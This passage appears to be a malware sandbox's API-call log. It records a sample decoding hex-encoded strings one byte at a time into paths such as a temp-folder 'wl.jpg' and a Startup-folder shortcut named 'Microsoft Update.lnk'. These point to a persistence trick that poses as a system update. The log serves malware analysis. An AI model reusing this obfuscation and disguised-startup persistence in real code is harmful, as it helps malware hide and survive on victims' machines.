wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] lstrlenW (lpString="40") returned 2 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] lstrlenW (lpString="74") returned 2 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] lstrlenW (lpString="65") returned 2 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] lstrlenW (lpString="6D") returned 2 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] lstrlenW (lpString="70") returned 2 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] lstrlenW (lpString="64") returned 2 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] lstrlenW (lpString="69") returned 2 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] lstrlenW (lpString="72") returned 2 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] lstrlenW (lpString="20") returned 2 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.627] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] lstrlenW (lpString="5C") returned 2 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] lstrlenW (lpString="77") returned 2 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] lstrlenW (lpString="6C") returned 2 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] lstrlenW (lpString="2E") returned 2 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] lstrlenW (lpString="6A") returned 2 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] lstrlenW (lpString="70") returned 2 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] lstrlenW (lpString="67") returned 2 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.628] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] lstrlenW (lpString="20") returned 2 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] lstrlenW (lpString="30") returned 2 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] lstrlenW (lpString="20") returned 2 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] lstrlenW (lpString="20") returned 2 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] lstrlenW (lpString="40") returned 2 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] lstrlenW (lpString="53") returned 2 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] lstrlenW (lpString="74") returned 2 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] lstrlenW (lpString="61") returned 2 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.629] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] lstrlenW (lpString="72") returned 2 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] lstrlenW (lpString="74") returned 2 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] lstrlenW (lpString="75") returned 2 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] lstrlenW (lpString="70") returned 2 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] lstrlenW (lpString="44") returned 2 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] lstrlenW (lpString="69") returned 2 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] lstrlenW (lpString="72") returned 2 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] lstrlenW (lpString="20") returned 2 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.630] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] lstrlenW (lpString="2F") returned 2 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] lstrlenW (lpString="4D") returned 2 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] lstrlenW (lpString="69") returned 2 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] lstrlenW (lpString="63") returned 2 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] lstrlenW (lpString="72") returned 2 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] lstrlenW (lpString="6F") returned 2 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] lstrlenW (lpString="73") returned 2 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] lstrlenW (lpString="6F") returned 2 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] lstrlenW (lpString="66") returned 2 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.631] lstrlenW (lpString="74") returned 2 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] lstrlenW (lpString="20") returned 2 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] lstrlenW (lpString="55") returned 2 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] lstrlenW (lpString="70") returned 2 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] lstrlenW (lpString="64") returned 2 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] lstrlenW (lpString="61") returned 2 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] lstrlenW (lpString="74") returned 2 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] lstrlenW (lpString="65") returned 2 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] lstrlenW (lpString="2E") returned 2 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] lstrlenW (lpString="6C") returned 2 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.632] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] lstrlenW (lpString="6E") returned 2 [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] lstrlenW (lpString="6B") returned 2 [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] lstrlenW (lpString="20") returned 2 [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] lstrlenW (lpString="40") returned 2 [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] lstrlenW (lpString="53") returned 2 [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] lstrlenW (lpString="63") returned 2 [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.633] lstrlenW (lpString="72") returned 2 [0083.633] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.635] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.638] lstrlenW (lpString="69") returned 2 [0083.638] PeekMessageW (in: 